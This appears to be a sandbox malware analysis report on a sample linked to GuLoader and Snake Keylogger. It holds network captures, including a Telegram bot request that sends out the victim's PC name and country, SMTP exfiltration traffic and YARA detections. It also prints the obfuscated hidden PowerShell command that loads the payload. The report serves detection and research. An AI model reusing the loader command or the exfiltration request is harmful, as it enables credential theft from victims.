                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            4192.168.2.449768188.114.96.34437824C:\Windows\SysWOW64\msiexec.exe
                                            TimestampBytes transferredDirectionData
                                            2024-10-14 07:12:14 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                            Host: reallyfreegeoip.org
                                            2024-10-14 07:12:14 UTC706INHTTP/1.1 200 OK
                                            Date: Mon, 14 Oct 2024 07:12:14 GMT
                                            Content-Type: application/xml
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            access-control-allow-origin: *
                                            vary: Accept-Encoding
                                            Cache-Control: max-age=86400
                                            CF-Cache-Status: HIT
                                            Age: 24010
                                            Last-Modified: Mon, 14 Oct 2024 00:32:04 GMT
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EOAxPDiF8G3i5wW7lCZGMwY9VO1SULDMZGI2ZgbtkUa9lARCbq%2FD8ftPspl2OkxT5Jwl9NQWX5skaK3mjbe3W8JR%2FhvLWGxRBMI%2BrXIFMQamFRNMLW0gmEgT8WYJpNuauhiaaXD1"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8d25c28b3bba440c-EWR
                                            alt-svc: h3=":443"; ma=86400
                                            2024-10-14 07:12:14 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                            2024-10-14 07:12:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            5192.168.2.449775188.114.96.34437824C:\Windows\SysWOW64\msiexec.exe
                                            TimestampBytes transferredDirectionData
                                            2024-10-14 07:12:15 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                            Host: reallyfreegeoip.org
                                            Connection: Keep-Alive
                                            2024-10-14 07:12:15 UTC704INHTTP/1.1 200 OK
                                            Date: Mon, 14 Oct 2024 07:12:15 GMT
                                            Content-Type: application/xml
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            access-control-allow-origin: *
                                            vary: Accept-Encoding
                                            Cache-Control: max-age=86400
                                            CF-Cache-Status: HIT
                                            Age: 24011
                                            Last-Modified: Mon, 14 Oct 2024 00:32:04 GMT
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kg9M1V114RUdW2%2B0jm0c2GgIE1oVORHL23HiRIQanhy4dFJMZ0L4ESPAnfQY1GgPtlM5yx4chwJQeekf3qqpa3STrukMaFAo%2B9Ao0qbgZ0u3K7HHZHoYSfHM1jRPici6zmgGFdlh"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8d25c2924c3942ea-EWR
                                            alt-svc: h3=":443"; ma=86400
                                            2024-10-14 07:12:15 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                            2024-10-14 07:12:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            6192.168.2.449783188.114.96.34437824C:\Windows\SysWOW64\msiexec.exe
                                            TimestampBytes transferredDirectionData
                                            2024-10-14 07:12:16 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                            Host: reallyfreegeoip.org
                                            2024-10-14 07:12:16 UTC702INHTTP/1.1 200 OK
                                            Date: Mon, 14 Oct 2024 07:12:16 GMT
                                            Content-Type: application/xml
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            access-control-allow-origin: *
                                            vary: Accept-Encoding
                                            Cache-Control: max-age=86400
                                            CF-Cache-Status: HIT
                                            Age: 24012
                                            Last-Modified: Mon, 14 Oct 2024 00:32:04 GMT
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=STbqBrUO3PgTCHVuchUiElEjye96ojTpmqqzXYkOD8c5FrcwbQBlAMn%2BcjbmAGGqDfQ1YOz0M4Ix8LbFvcUU7hDg3vvPWV4cCGLbP5uwBabaZavetv0JrGCkPWW0kyPUFCoUk3kM"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8d25c2997aab0f6b-EWR
                                            alt-svc: h3=":443"; ma=86400
                                            2024-10-14 07:12:16 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                            2024-10-14 07:12:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            7192.168.2.449794188.114.96.34437824C:\Windows\SysWOW64\msiexec.exe
                                            TimestampBytes transferredDirectionData
                                            2024-10-14 07:12:17 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                            Host: reallyfreegeoip.org
                                            Connection: Keep-Alive
                                            2024-10-14 07:12:18 UTC704INHTTP/1.1 200 OK
                                            Date: Mon, 14 Oct 2024 07:12:17 GMT
                                            Content-Type: application/xml
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            access-control-allow-origin: *
                                            vary: Accept-Encoding
                                            Cache-Control: max-age=86400
                                            CF-Cache-Status: HIT
                                            Age: 24013
                                            Last-Modified: Mon, 14 Oct 2024 00:32:04 GMT
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ETyN1EKPGGdtDJRU9o2DSQdYMRU6jPpeTNoFDF6WuMe7gwA7d2hhyaAZWaSPIQodZrJdy73cUnd77lcD%2BjKOXNj%2BEUftKAO7yNNHTxI21Gg1BotmhfAhzjdCoXhnJAAbdpW5UY50"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8d25c2a06ad142b5-EWR
                                            alt-svc: h3=":443"; ma=86400
                                            2024-10-14 07:12:18 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                            2024-10-14 07:12:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            8192.168.2.449802188.114.96.34437824C:\Windows\SysWOW64\msiexec.exe
                                            TimestampBytes transferredDirectionData
                                            2024-10-14 07:12:18 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                            Host: reallyfreegeoip.org
                                            2024-10-14 07:12:19 UTC708INHTTP/1.1 200 OK
                                            Date: Mon, 14 Oct 2024 07:12:19 GMT
                                            Content-Type: application/xml
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            access-control-allow-origin: *
                                            vary: Accept-Encoding
                                            Cache-Control: max-age=86400
                                            CF-Cache-Status: HIT
                                            Age: 24015
                                            Last-Modified: Mon, 14 Oct 2024 00:32:04 GMT
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cF%2FGqMGBCsquedqi5LFtLoa7JlPat97DwH4mKMBD7O6HAXS9xn%2FB0Gau2cbRD9mnX8zwSHaQq8H7kLHPF%2BE1dalTRfM0MzrfoJjGCpoXIJspcjCpDY3xRc3K1l%2FRxXpMFVyR1eQ0"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8d25c2a72bba42a3-EWR
                                            alt-svc: h3=":443"; ma=86400
                                            2024-10-14 07:12:19 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                            2024-10-14 07:12:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            9192.168.2.449812188.114.96.34437824C:\Windows\SysWOW64\msiexec.exe
                                            TimestampBytes transferredDirectionData
                                            2024-10-14 07:12:20 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                            Host: reallyfreegeoip.org
                                            Connection: Keep-Alive
                                            2024-10-14 07:12:20 UTC716INHTTP/1.1 200 OK
                                            Date: Mon, 14 Oct 2024 07:12:20 GMT
                                            Content-Type: application/xml
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            access-control-allow-origin: *
                                            vary: Accept-Encoding
                                            Cache-Control: max-age=86400
                                            CF-Cache-Status: HIT
                                            Age: 24016
                                            Last-Modified: Mon, 14 Oct 2024 00:32:04 GMT
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mpBBecnX%2BE8UQINfzn6oP2XWlC%2B3sjVSuu6qrKPsMNAbC%2FQv0gNdA6U3Lp2tLPx%2BuKsv%2BdWE5O%2FK7Oy8WgJKKuqXOymsdgCaKXB7Tf4bVbgav%2FCKB30%2FI8ZIVCq7n1Oufy7fPsYj"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8d25c2ae1dfb4273-EWR
                                            alt-svc: h3=":443"; ma=86400
                                            2024-10-14 07:12:20 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                            2024-10-14 07:12:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            10192.168.2.449821188.114.96.34437824C:\Windows\SysWOW64\msiexec.exe
                                            TimestampBytes transferredDirectionData
                                            2024-10-14 07:12:21 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                            Host: reallyfreegeoip.org
                                            2024-10-14 07:12:21 UTC710INHTTP/1.1 200 OK
                                            Date: Mon, 14 Oct 2024 07:12:21 GMT
                                            Content-Type: application/xml
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            access-control-allow-origin: *
                                            vary: Accept-Encoding
                                            Cache-Control: max-age=86400
                                            CF-Cache-Status: HIT
                                            Age: 24017
                                            Last-Modified: Mon, 14 Oct 2024 00:32:04 GMT
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ziOG%2Fjr6Z7cPLaMXOBXa%2B%2BEJ2pNWL4GH69OpV2dwIp2aWXAmemPgDGQlFAiE1kJvAmS6bT3Sh4HoGqzNYSJl1eS13YDyzXn67ZieG4KpGm%2F5IpLbi3Wh1SpTx%2FAzliAM113K7QOM"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8d25c2b51899427c-EWR
                                            alt-svc: h3=":443"; ma=86400
                                            2024-10-14 07:12:21 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                            2024-10-14 07:12:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            11192.168.2.449827149.154.167.2204437824C:\Windows\SysWOW64\msiexec.exe
                                            TimestampBytes transferredDirectionData
                                            2024-10-14 07:12:22 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:179605%0D%0ADate%20and%20Time:%2014/10/2024%20/%2014:08:15%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20179605%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                            Host: api.telegram.org
                                            Connection: Keep-Alive
                                            2024-10-14 07:12:22 UTC344INHTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0
                                            Date: Mon, 14 Oct 2024 07:12:22 GMT
                                            Content-Type: application/json
                                            Content-Length: 55
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2024-10-14 07:12:22 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                            Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                            TimestampSource PortDest PortSource IPDest IPCommands
                                            Oct 14, 2024 09:12:29.837857962 CEST58749873213.165.67.118192.168.2.4220 kundenserver.de (mreue106) Nemesis ESMTP Service ready
                                            Oct 14, 2024 09:12:29.838051081 CEST49873587192.168.2.4213.165.67.118EHLO 179605
                                            Oct 14, 2024 09:12:30.060738087 CEST58749873213.165.67.118192.168.2.4250-kundenserver.de Hello 179605 [8.46.123.33]
                                            250-8BITMIME
                                            250-SIZE 141557760
                                            250 STARTTLS
                                            Oct 14, 2024 09:12:30.060990095 CEST49873587192.168.2.4213.165.67.118STARTTLS
                                            Oct 14, 2024 09:12:30.289165020 CEST49873587192.168.2.4213.165.67.118STARTTLS
                                            Oct 14, 2024 09:12:30.386837006 CEST58749873213.165.67.118192.168.2.4250-kundenserver.de Hello 179605 [8.46.123.33]
                                            250-8BITMIME
                                            250-SIZE 141557760
                                            250 STARTTLS
                                            Oct 14, 2024 09:12:30.580526114 CEST58749873213.165.67.118192.168.2.4220 OK

                                            Click to jump to process

                                            Click to jump to process

                                            Click to dive into process behavior distribution

                                            Click to jump to process

                                            Target ID:0
                                            Start time:03:11:22
                                            Start date:14/10/2024
                                            Path:C:\Users\user\Desktop\Snvlerier.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\Snvlerier.exe"
                                            Imagebase:0x400000
                                            File size:1'261'140 bytes
                                            MD5 hash:9970463EDF086976996F0BC196FCFC60
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:true

                                            Target ID:1
                                            Start time:03:11:22
                                            Start date:14/10/2024
                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):true
                                            Commandline:"powershell.exe" -windowstyle hidden "$Dictyoceratine=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\carinal\Coracosteon\Eftermles.Tra';$Ciceronian=$Dictyoceratine.SubString(53398,3);.$Ciceronian($Dictyoceratine)"
                                            Imagebase:0xc70000
                                            File size:433'152 bytes
                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.2199226437.00000000093E6000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:high
                                            Has exited:true

                                            Target ID:2
                                            Start time:03:11:22
                                            Start date:14/10/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:6
                                            Start time:03:12:01
                                            Start date:14/10/2024
                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                            Imagebase:0x420000
                                            File size:59'904 bytes
                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.3066949084.0000000021501000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.3066949084.0000000021608000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:high
                                            Has exited:false

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:20.7%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:22.6%
                                              Total number of Nodes:1263
                                              Total number of Limit Nodes:36
                                              execution_graph 3726 4019c0 3727 402a07 18 API calls 3726->3727 3728 4019c7 3727->3728 3729 402a07 18 API calls 3728->3729 3730 4019d0 3729->3730 3731 4019d7 lstrcmpiA 3730->3731 3732 4019e9 lstrcmpA 3730->3732 3733 4019dd 3731->3733 3732->3733 3040 4023c6 3051 402b11 3040->3051 3042 4023d0 3043 402a07 18 API calls 3042->3043 3044 4023d9 3043->3044 3045 4023e3 RegQueryValueExA 3044->3045 3048 40266d 3044->3048 3046 402409 RegCloseKey 3045->3046 3047 402403 3045->3047 3046->3048 3047->3046 3055 405c4b wsprintfA 3047->3055 3052 402a07 18 API calls 3051->3052 3053 402b2a 3052->3053 3054 402b38 RegOpenKeyExA 3053->3054 3054->3042 3055->3046 3734 404146 3735 40415c 3734->3735 3742 404268 3734->3742 3738 403ffd 19 API calls 3735->3738 3736 4042d7 3737 4043ab 3736->3737 3739 4042e1 GetDlgItem 3736->3739 3745 404064 8 API calls 3737->3745 3743 4041b2 3738->3743 3740 4042f7 3739->3740 3741 404369 3739->3741 3740->3741 3747 40431d 6 API calls 3740->3747 3741->3737 3748 40437b 3741->3748 3742->3736 3742->3737 3744 4042ac GetDlgItem SendMessageA 3742->3744 3746 403ffd 19 API calls 3743->3746 3765 40401f EnableWindow 3744->3765 3750 4043a6 3745->3750 3751 4041bf CheckDlgButton 3746->3751 3747->3741 3753 404381 SendMessageA 3748->3753 3754 404392 3748->3754 3763 40401f EnableWindow 3751->3763 3753->3754 3754->3750 3757 404398 SendMessageA 3754->3757 3755 4042d2 3766 4043d0 3755->3766 3756 4041dd GetDlgItem 3764 404032 SendMessageA 3756->3764 3757->3750 3760 4041f3 SendMessageA 3761 404211 GetSysColor 3760->3761 3762 40421a SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 3760->3762 3761->3762 3762->3750 3763->3756 3764->3760 3765->3755 3767 4043e3 SendMessageA 3766->3767 3768 4043de 3766->3768 3767->3736 3768->3767 3769 4062c7 3771 40614b 3769->3771 3770 406ab6 3771->3770 3772 4061d5 GlobalAlloc 3771->3772 3773 4061cc GlobalFree 3771->3773 3774 406243 GlobalFree 3771->3774 3775 40624c GlobalAlloc 3771->3775 3772->3770 3772->3771 3773->3772 3774->3775 3775->3770 3775->3771 3779 402b4c 3780 402b74 3779->3780 3781 402b5b SetTimer 3779->3781 3782 402bc2 3780->3782 3783 402bc8 MulDiv 3780->3783 3781->3780 3784 402b82 wsprintfA SetWindowTextA SetDlgItemTextA 3783->3784 3784->3782 3786 401ccc GetDlgItem GetClientRect 3787 402a07 18 API calls 3786->3787 3788 401cfc LoadImageA SendMessageA 3787->3788 3789 401d1a DeleteObject 3788->3789 3790 40289c 3788->3790 3789->3790 3316 40324d #17 SetErrorMode OleInitialize 3389 406018 GetModuleHandleA 3316->3389 3320 4032bd GetCommandLineA 3394 405ced lstrcpynA 3320->3394 3322 4032cf GetModuleHandleA 3323 4032e6 3322->3323 3324 4057c5 CharNextA 3323->3324 3325 4032fa CharNextA 3324->3325 3333 40330a 3325->3333 3326 4033cf 3327 4033e2 GetTempPathA 3326->3327 3395 403219 3327->3395 3329 4033fa 3330 403454 DeleteFileA 3329->3330 3331 4033fe GetWindowsDirectoryA lstrcatA 3329->3331 3403 402c83 GetTickCount GetModuleFileNameA 3330->3403 3334 